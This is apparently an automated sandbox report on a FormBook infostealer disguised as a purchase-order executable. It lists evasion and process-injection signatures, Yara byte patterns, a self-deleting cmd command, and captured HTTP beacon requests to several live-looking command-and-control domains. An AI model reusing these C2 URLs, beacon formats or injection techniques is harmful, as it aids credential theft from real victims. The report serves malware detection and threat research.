Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Purchase Order 40,7045$.exe

Overview

General Information

Sample Name:Purchase Order 40,7045$.exe
Analysis ID:321389
MD5:ba4f1b472cb69d8a3924d88dacf1b833
SHA1:622cdccdc0f020d368a87c5eff9ec1a1259e21c7
SHA256:2a694c3a8347816b2f85e036b1064e410ad1578185a0608416944199ef72b82c
Tags:exeFormbookYahoo

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Purchase Order 40,7045$.exe (PID: 6708 cmdline: 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe' MD5: BA4F1B472CB69D8A3924D88DACF1B833)
    • MSBuild.exe (PID: 6748 cmdline: {path} MD5: D621FD77BD585874F9686D3A76462EF1)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • raserver.exe (PID: 7048 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 6200 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16089:$sqlite3step: 68 34 1C 7B E1
    • 0x1619c:$sqlite3step: 68 34 1C 7B E1
    • 0x160b8:$sqlite3text: 68 38 2A 90 C5
    • 0x161dd:$sqlite3text: 68 38 2A 90 C5
    • 0x160cb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.MSBuild.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.MSBuild.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x75d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13285:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x12d71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13387:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x134ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x837a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x11fec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x90f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18367:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x193da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.MSBuild.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15289:$sqlite3step: 68 34 1C 7B E1
        • 0x1539c:$sqlite3step: 68 34 1C 7B E1
        • 0x152b8:$sqlite3text: 68 38 2A 90 C5
        • 0x153dd:$sqlite3text: 68 38 2A 90 C5
        • 0x152cb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x153f3:$sqlite3blob: 68 53 D8 7F 8C
        1.2.MSBuild.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.MSBuild.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.allmm.info/igqu/?1b3H_Ni=4PnhXD1XQOAEhvyRg6knEMy8erSWBtwfFfVfV7Yg7HuI1lqkNO9tokZPvE8hw33lw/Tr&JXhpvv=OXXTgtL8CzU0PRx0Avira URL Cloud: Label: malware
          Source: http://www.forbigdogs.com/igqu/?1b3H_Ni=hqyhMfRLrOIQC7GjaQnjrCruer7JrdNhQeLxI9U0LsQdDm7qZoXdq0VVbkb5+tb+Xu86&JXhpvv=OXXTgtL8CzU0PRx0Avira URL Cloud: Label: malware
          Multi AV Scanner detection for submitted fileShow sources
          Source: Purchase Order 40,7045$.exeReversingLabs: Detection: 18%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: Purchase Order 40,7045$.exeJoe Sandbox ML: detected
          Source: 1.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then pop edi
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then pop edi
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop ebx

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49747
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49756
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49758
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49759
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xt/OgRWZ9lL&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.ariasu-nakanokaikei.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=Jn5Vr1+14bH3XXZofqraFeWVa26wP8rJvzlWs5bnBoBEHljdRY0tb4g4rLkzBbL1dWSS&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.allan-wren.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=7TsZUea1gk4hSEvdc6EZbm1J0Wfs+lYlHRlJN5vF1TH1x8D6KkvV8DgWQzT8NLbVi8yc&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.theoutdoorbed.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJg4WZr1G+1s&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.sweetbasilmarketing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=cgoB+lenqGYlJtvc5JNC9VTF2CGbWvKagdSG/Om1O4x9+LG6GIhzUmnXZfPmgHDFLZxT&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.pasumaisangam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEBypKVKLfK2k&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.justsoldbykristen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=xBkCUm8FF1kjoaFXSBT5hrl7iUeljBCg0asG3x/fx29GNVo3vuMsob2h52kMpeSzyrJ8&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.lotoencasa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=KYQlcl9vZGj8bR01lvQ9gDl5O0hjo7xV5yl6UTMOowrmblKr/7vG5jbVDjpERd28t5Sb&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.guidesgold.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=UOytMzsBKWezP+Z4jPobAURSNGb1svEAtMI07cL6UgNiZ1/Q1uLpHFW2AnXGybnNRzQX&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.thoughtslate.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHGkKev0TSo0+&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.chemtradent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=ZRPeOuYuFqwCE6hLODJInGZZul3mSlUAF2kmaH+TgtUwwh/GNGVQ9RWrqwSZOKD9NgnN&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.erpsystem.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=hqyhMfRLrOIQC7GjaQnjrCruer7JrdNhQeLxI9U0LsQdDm7qZoXdq0VVbkb5+tb+Xu86&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.forbigdogs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=42cTP78OQQp4lToQAaTApkvzdS7tu3b97V7Z9hUZNPZ7GHRvcEVBBFWfORKXu9ozCmYh&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.rockinglifefromhome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=4PnhXD1XQOAEhvyRg6knEMy8erSWBtwfFfVfV7Yg7HuI1lqkNO9tokZPvE8hw33lw/Tr&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.allmm.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xt/OgRWZ9lL&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.ariasu-nakanokaikei.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 81.169.145.95 81.169.145.95
          Source: Joe Sandbox ViewIP Address: 185.201.11.126 185.201.11.126
          Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
          Source: Joe Sandbox ViewASN Name: IOFLOODUS IOFLOODUS
          Source: unknownTCP traffic detected without corresponding DNS query: 104.42.151.234
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 104.79.89.181
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 84.53.167.113
          Source: unknownTCP traffic detected without corresponding DNS query: 84.53.167.113
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 40.67.254.36
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 40.67.254.36
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 104.79.89.181
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.129.133
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xt/OgRWZ9lL&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.ariasu-nakanokaikei.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=Jn5Vr1+14bH3XXZofqraFeWVa26wP8rJvzlWs5bnBoBEHljdRY0tb4g4rLkzBbL1dWSS&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.allan-wren.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=7TsZUea1gk4hSEvdc6EZbm1J0Wfs+lYlHRlJN5vF1TH1x8D6KkvV8DgWQzT8NLbVi8yc&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.theoutdoorbed.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJg4WZr1G+1s&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.sweetbasilmarketing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=cgoB+lenqGYlJtvc5JNC9VTF2CGbWvKagdSG/Om1O4x9+LG6GIhzUmnXZfPmgHDFLZxT&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.pasumaisangam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEBypKVKLfK2k&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.justsoldbykristen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=xBkCUm8FF1kjoaFXSBT5hrl7iUeljBCg0asG3x/fx29GNVo3vuMsob2h52kMpeSzyrJ8&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.lotoencasa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=KYQlcl9vZGj8bR01lvQ9gDl5O0hjo7xV5yl6UTMOowrmblKr/7vG5jbVDjpERd28t5Sb&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.guidesgold.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=UOytMzsBKWezP+Z4jPobAURSNGb1svEAtMI07cL6UgNiZ1/Q1uLpHFW2AnXGybnNRzQX&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.thoughtslate.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHGkKev0TSo0+&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.chemtradent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=ZRPeOuYuFqwCE6hLODJInGZZul3mSlUAF2kmaH+TgtUwwh/GNGVQ9RWrqwSZOKD9NgnN&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.erpsystem.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=hqyhMfRLrOIQC7GjaQnjrCruer7JrdNhQeLxI9U0LsQdDm7qZoXdq0VVbkb5+tb+Xu86&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.forbigdogs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=42cTP78OQQp4lToQAaTApkvzdS7tu3b97V7Z9hUZNPZ7GHRvcEVBBFWfORKXu9ozCmYh&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.rockinglifefromhome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=4PnhXD1XQOAEhvyRg6knEMy8erSWBtwfFfVfV7Yg7HuI1lqkNO9tokZPvE8hw33lw/Tr&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.allmm.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?1b3H_Ni=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xt/OgRWZ9lL&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.ariasu-nakanokaikei.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: g.msn.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 21 Nov 2020 08:24:27 GMTServer: Apache/2.4.43 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
